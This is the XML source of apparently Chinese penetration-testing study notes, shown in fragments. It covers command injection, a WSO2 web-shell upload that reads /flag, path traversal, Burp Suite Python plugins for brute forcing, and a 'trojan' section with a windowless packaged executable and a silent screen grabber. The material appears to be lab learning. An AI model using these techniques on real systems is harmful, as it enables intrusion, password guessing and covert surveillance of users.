      <w:bookmarkEnd w:id="3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全局寻找网站代码中是否存在类似command等参数提供注入的地方（一般后续代码中包含cmd、bash等指令操作的代码）。使用BurpSuite截取POST请求，下方增加参数（假设叫command）：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command=whoami查看用户信息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command=ipconfig查看IP地址信息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36" w:name="_Toc13137"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）WSO2漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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脚本如下，在burpsuite中拦截请求全选并粘贴使用，注意替换里面的HOST地址，之后放过拦截，会运行并生成上传authenticationendpoint/testshell.jsp文件，访问：URL地址前缀/authenticationendpoint/testshell.jsp得到上传cmd指令的网页，输入ls，cat /flag等指令得到信息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pt;width:40.05pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId166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65">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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7" w:name="_Toc9398"/>
      <w:bookmarkStart w:id="38" w:name="_Toc2016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3.文件操作漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="3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upload、download等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在路径前加入../../../../../../../../../切换到根目录，然后追加输入指定文件的目录位置可以下载指定路径的文件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9" w:name="_Toc3884"/>
      <w:bookmarkStart w:id="40" w:name="_Toc1921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4.代码注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="4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全局寻找网站代码中是否存在类似compile等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在参数输入文件操作指令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1" w:name="_Toc22660"/>
      <w:bookmarkStart w:id="42" w:name="_Toc19141"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc4290"/>
      <w:bookmarkStart w:id="44" w:name="_Toc3205"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python安全应用编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc26750"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45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5pt;width:62.35pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId168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6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898775"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
            <wp:docPr id="100" name="图片 100" descr="屏幕截图 2023-07-01 22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3-07-01 22580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6" w:name="_Toc1309"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Web编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46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55.25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70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727835"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="101" name="图片 101" descr="屏幕截图 2023-07-02 0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3-07-02 00015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202815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="102" name="图片 102" descr="屏幕截图 2023-07-02 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3-07-02 00002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2385060"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="103" name="图片 103" descr="屏幕截图 2023-07-02 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07-02 00004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1294765"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="104" name="图片 104" descr="屏幕截图 2023-07-02 13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07-02 13100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本地启一个Web服务，运行后可以使用ip端口带参数访问网址了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9" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId177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76">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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75205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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25240" cy="5692140"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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综合：爬虫获取网站多页制定内容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5420" cy="3053715"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="105" name="图片 105" descr="屏幕截图 2023-07-02 13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07-02 13333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851785"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335"/>
            <wp:docPr id="106" name="图片 106" descr="屏幕截图 2023-07-02 13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07-02 13341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7" w:name="_Toc8465"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）多线程(队列)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:68.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId183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8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3070860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="107" name="图片 107" descr="屏幕截图 2023-07-02 21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07-02 2119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8" w:name="_Toc11631"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）网络编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48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首先查看kali的IP地址：cmd输入ifconfig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00600" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="108" name="图片 108" descr="屏幕截图 2023-07-02 22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07-02 22300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将客户端的python代码放到kali的Home文件夹下，并在cmd使用python 文件名启动（注意kali里的python文件不能有注释，否则报错）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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:87.7pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId187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186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1697355"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
            <wp:docPr id="109" name="图片 109" descr="屏幕截图 2023-07-02 22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07-02 2235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之后启动主机win10下的服务端的python代码，可以在kali的运行python中发现请求的IP地址信息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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:90.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId190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18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337050"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="110" name="图片 110" descr="屏幕截图 2023-07-02 22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07-02 2241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之后客户端发送请求就能够得到响应了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016125"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10795"/>
            <wp:docPr id="111" name="图片 111" descr="屏幕截图 2023-07-02 22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07-02 22442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49" w:name="_Toc24550"/>
      <w:bookmarkStart w:id="50" w:name="_Toc1685"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite基于python插件开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc25493"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）环境配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/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在Burp Suite中选择Extender-Options-Python Environment配置jython的文件位置（jython是用来将python转换为java的文件）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764155"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="112" name="图片 112" descr="屏幕截图 2023-07-03 23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07-03 23274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官方文档已经导出到本地文件夹中：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813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2" w:name="_Toc10669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Burp Suite使用Python脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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编写python脚本如下，之后在Extensions中点击Add，选择文件类型为Python，点击Select file...导入python脚本，点击打开：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33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6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195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#导入接口类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print("Hello Burp!")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947920"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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之后程序自动运行并在Output中输出结果，如果有错误会在Errors中输出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958080"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1016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3" w:name="_Toc15566"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）自定义Burp Suite插件名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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自定义插件名称，编写脚本如下，可以看到导入后名称编程了代码里指定的名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1034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0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19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32585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1333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4" w:name="_Toc7455"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）自定义Burp Suite插件并引入到菜单项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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自定义插件引入到邮件菜单项中，含有二级菜单，并且通过二级菜单出发函数执行操作，点击调用函数的二级菜单，在output中可以看到函数执行的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1035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20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IBurpExtender,IContextMenuFactory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JMenuItem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IContextMenuFactory):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callbacks.registerContextMenuFactory(self)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createMenuItems(self, invocation):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 = []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 = JMenu("Hello I an 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subMenu_1 = JMenuItem("I am subMenu")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main_menu.add(subMenu_1)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subMenu_2 = JMenuItem('Send to other Method',actionPerformed=self.run)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menu_list.append(main_menu)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menu_list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run(self, event):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print(event)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print('Menu run.')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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440305"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1333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5" w:name="_Toc4418"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（五）自定义Burp Suite插件获取cookies信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本获取cookies信息，通过监听浏览器的网页操作得到cookies信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1036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6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20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IBurpExtender,ICookie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ICookie):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self._callbacks = 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cookies = self._callbacks.getCookieJarContents()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self.cookiesInformations(cookies)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cookiesInformations(self, cookies):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i in cookies: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 i.getDomain()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print(i.getName() + ':' + i.getValue())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477645"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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6" w:name="_Toc3844"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Burp Suite官方文档提供了很多工具方法，例如Base64编码等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1037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9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208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self._helps = callbacks.getHelpers()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print(self._helps.base64Encode("MyExten"))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5680" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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31473"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（七）自定义Burp Suite插件完全删除所有相关项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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在删除或者取消插件时，如果需要将插件生成的相关文件信息全部删除，那么使用如下脚本即可实现全面清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1038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2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21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IExtensionStateListener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IExtensionStateListener):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callbacks.registerExtensionStateListener(self)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extensinUnloaded(self):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print("MyExten Unloaded!")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58" w:name="_Toc27772"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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脚本监听获取HTTP请求信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1039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4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213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reqMsg = self._helpers.bytesToString(messageInfo.getRequest())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print("Http Requests:" + reqMsg)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00805"/>
            <wp:effectExtent l="0" t="0" r="5715" b="63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9" w:name="_Toc2324"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/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脚本监听Http或者Https的Host、port以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1040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7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216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#coding=utf-8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#导入接口类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IHttpService = messageInfo.getHttpService()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print("Host:\t", IHttpService.getHost())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print("Port:\t", IHttpService.getPort())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print("Protocol:\t", IHttpService.getProtocol())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576320"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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0" w:name="_Toc27667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十）自定义Burp Suite插件使用本地字典爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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编写脚本实现自己的Intruder，并在本地创建字典.txt。将Burp Suite拦截的请求发送到Intruder，在Positions中设置好变量，之后在Payloads中将Payload Sets中的Payload type设置为Extension-generated，再点击Payload Options-Select generated，就能发现脚本中编写的My Intruder，选择后点击OK，点击Start Attack进行字典内容的遍历爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1041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0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219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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:57.8pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId222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22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IIntruderPayloadGeneratorFactory, IIntruderPayloadGenerator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IIntruderPayloadGeneratorFactory):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callbacks.registerIntruderPayloadGeneratorFactory(self)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createNewInstance(self, attack):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mtattack = attack.getHttpService()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template = attack.getRequestTemplate()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IntruderPayloadGenerator()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getGeneratorName(self):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Intruder'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IntruderPayloadGenerator(IIntruderPayloadGenerator):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 = open('pwd_192.txt', 'r')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self.payload = [i.strip() for i in f]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f.close()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self.count = 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self.flag =True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hasMorePayloads(self):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self.flag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#baseValue为Position中标记的基准值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getNextPayload(self,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len(self.payload) &gt; self.count + 1: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self.count +=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print(self.payload[self.count])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self.payload[self.count]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self.flag = false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rest(self):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字典文件我就只写了1、2、3，根据需求使用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33040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1016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929255"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065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20595"/>
            <wp:effectExtent l="0" t="0" r="5715" b="444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1" w:name="_Toc13168"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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脚本编写自己的Intruder并批量处理字典内容后爆破，还是先在Intruder-Payloads-Payload type设置为Simple list，之后在Payload Options中选择Load...上传字典，再点击Payload Processing中的Add按钮，选择Invoke Burp extension后可以看到脚本中的My Processor，选择后点击OK，这里爆破可以看到脚本中base64编码处理过的内容进行了爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1043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7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226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base64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IIntruderPayloadProcessor):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callbacks.registerIntruderPayloadProcessor(self)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getProcessorName(self):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Processor'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processPayload(self, currentPayload, originalPayload,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currentPayload = self._helpers.bytesToString(currentPayload)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newPayload = base64.b16encode(currentPayload)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newPayload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24935"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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061335"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="1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  <w:ind w:leftChars="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc31800"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自定义Web服务&amp;快速找出IP地址泄露</w:t>
      </w:r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本地起一个ip端口网址，效果见八-1-(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1044" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId231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230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flask import Flask, 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 = Flask(__name__)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index():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@app.route('/ip/&lt;random&gt;')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ip(random):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@app.route('/key/&lt;random&gt;')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key(random):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'access_token: random-' + str(time.time())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app.run(debug = True, port = 9999)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在检测IP地址端口访问的时候，可以在Dashboard中的Issue activity看到各个IP端口访问情况，可以选择全部右键选择Report issue导出文件，一直点next知道出现选择保存文件位置的时候，自己设置保存的HTML格式文件名及位置，点击保存后一直点next到结束，就可以看到保存的HTML文件了，便于查看整理信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1045" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId233" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1045" DrawAspect="Content" ObjectID="_1468075745" r:id="rId232">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3840480" cy="3459480"/>
            <wp:effectExtent l="0" t="0" r="0" b="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91180"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc13685"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows基于python木马脚本开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63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4" w:name="_Toc15985"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）简单输出程序及静默化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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首先打开包安装文件夹，我这里是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C:\Users\Lenovo\AppData\Roaming\Python\Python39\Scrip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ts，在这个文件夹打开cmd，输入pyinstaller.exe -F 文件名即可打包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61310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="1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之后会生成dist文件夹，里面存放着生成的exe文件，cmd输入exe文件名，运行得到结果就是python脚本运行结果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792730"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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输入&gt;pyinstaller.exe -F 文件名 -i 图表名即可打包并将图标设置为指定图标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30350"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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输入&gt;pyinstaller.exe -F -w文件名即可打包并静默化exe，也就是双击exe会执行，但是不弹出窗口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5" w:name="_Toc30491"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）截图程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65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进行屏幕截图并在指定位置生成bmp图片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1046" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId240" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1046" DrawAspect="Content" ObjectID="_1468075746" r:id="rId239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运行后生成截图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30" name="图片 1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screenshot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win32gui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win32con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win32api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获取桌面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hdesktop = win32gui.GetDesktopWindow()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分辨率适应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 = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)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height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)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left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)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= win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)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desktop_dc = win32gui.GetWindowDC(hdesktop)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img_dc = win32ui.CreateDCFromHandle(desktop_dc)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创建一个内存设备描述表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 = img_dc.CreateCompatibleDC()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创建位图对象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 = win32ui.CreateBitmap()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screenshot.CreateCompatibleBitmap(img_dc, width, height)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mem_dc.SelectObject(screenshot)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截图至内存设备描述表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mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)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将截图保存到文件中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screenshot.SaveBitmapFile(mem_dc, u'C:\\Users\\Lenovo\\Desktop\\screenshot.bmp')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内存释放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mem_dc.DeleteDC()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win32gui.DeleteObject(screenshot.GetHandle())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc15666"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python信息搜集工具开发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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7" w:name="_Toc6617"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）高精度字典生成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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高精度字典生成，读取ini配置文件中带参数的正则表达式以及txt中参数值范围，之后运行得到指定条件下的高精度字典并输出的txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1047" o:spt="75" type="#_x0000_t75" style="height:35pt;width:46.65pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId243" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1047" DrawAspect="Content" ObjectID="_1468075747" r:id="rId242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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId245" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1048" DrawAspect="Content" ObjectID="_1468075748" r:id="rId244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47" o:title=""/>
